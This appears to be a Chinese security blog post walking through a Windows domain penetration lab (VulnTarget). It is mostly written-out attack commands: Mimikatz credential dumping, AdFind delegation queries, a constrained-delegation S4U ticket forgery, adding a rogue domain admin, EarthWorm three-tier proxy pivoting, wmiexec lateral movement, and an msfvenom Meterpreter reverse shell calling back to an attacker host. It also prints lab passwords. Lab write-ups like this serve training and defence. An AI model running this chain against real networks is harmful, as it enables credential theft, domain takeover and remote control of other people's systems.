0x01 前言
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!
0x01 前言
三级代理
约束性委派攻击
横向移动
0x02 信息收集
步骤一:开始进行信息收集,上传猕猴桃到Wins08执行抓取到域用户明文密码...
ping vulntarget.com //10.0.10.10
定位域控
meterpreter > run post/windows/gather/enum_domain
MSF添加路由
use post/multi/manage/autoroute
set session 3
run
MSF抓取密码
load kiwi
kiwi_cmd sekurlsa::logonpasswords
Mimikatz
privilege::debug //提升权限
sekurlsa::logonpasswords //抓取明文密码
Domain user:win2008
Domain user password:qweASD123
步骤二:上传Adfind程序判断存在非与约束性委派属性的并发现第三台主机上的win2008域账户对第四台主机10.10的CIFS服务存在约束委派...
查询域中配置非约束委派的主机
AdFind.exe -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn
查询域中配置非约束委派的服务账户
AdFind.exe -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn
茶渣
AdFind.exe -h 10.0.10.10 -u win2008 -up qweASD123 -b "DC=vulntarget,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
0x03 约束性委派攻击
请求约束性委派用户的TGT
tgt::ask /user:win2008 /domain:vulntarget.com /password:qweASD123 /ticket:ash.kirbi
伪造S4U请求并访问CIFS服务
tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/WIN-1PV25H8UJPN.vulntarget.com
privilege::debug
kerberos::ptt TGS_Administrator@vulntarget.com@VULNTARGET.COM_cifs~WIN-1PV25H8UJPN.vulntarget.com@VULNTARGET.COM.kirbi
exit
dir \\WIN-1PV25H8UJPN.vulntarget.com\C$
步骤五:执行以下命令创建域用户并将其添加到域管理员中,查看用户信息...
net user 4pts 123[email protected] /add /domain
net group "domain admins" 4pts /add /domain
net group "domain admins" /domain
0x04 三级代理
步骤六:这里为了访问到内网域控主机需要挂三级代理...并按照以下操作设置...
边界主机(一层)
外网主机3777端口接收来自攻击机流量,7779接收来自3777端口流量
ew.exe -s lcx_listen -l 3777 -e 7779 -t 1000000
Ubuntu主机(二层)
Ubuntu的7779端口获取外网主机7779端口的流量,3999端口接收7779端口的流量
./ew -s lcx_slave -d 192.168.100.155 -e 7779 -f 192.168.88.102 -g 3999 -t 1000000
Wins08R2主机(三层)
第三台主机代理了来自3999端口的流量
ew.exe -s ssocksd -l 3999 -t 1000000
0x05 横向移动
步骤七:使用Impacket 中提供的wmiexec.py工具远程执行,成功上线第四台主机!!!
proxychains python3 wmiexec.py 4pts:123admiN@@10.0.10.10
步骤八:生成反向马并上传之Wins08R2,使用以下项目开启HTTP服务并通过PowerShell下载执行
开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.10.9
set lport 5555
run
生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.10.9 LPORT=5555 -f exe > inside.exe
上传执行
lput iinside.exe C:\iinside.exe
步骤九:至此结束,展示下全部靶机合照...
0x06 往期精彩
红蓝对抗靶场之内网渗透【三】
红蓝对抗靶场VulnTarget-e之内网渗透【二】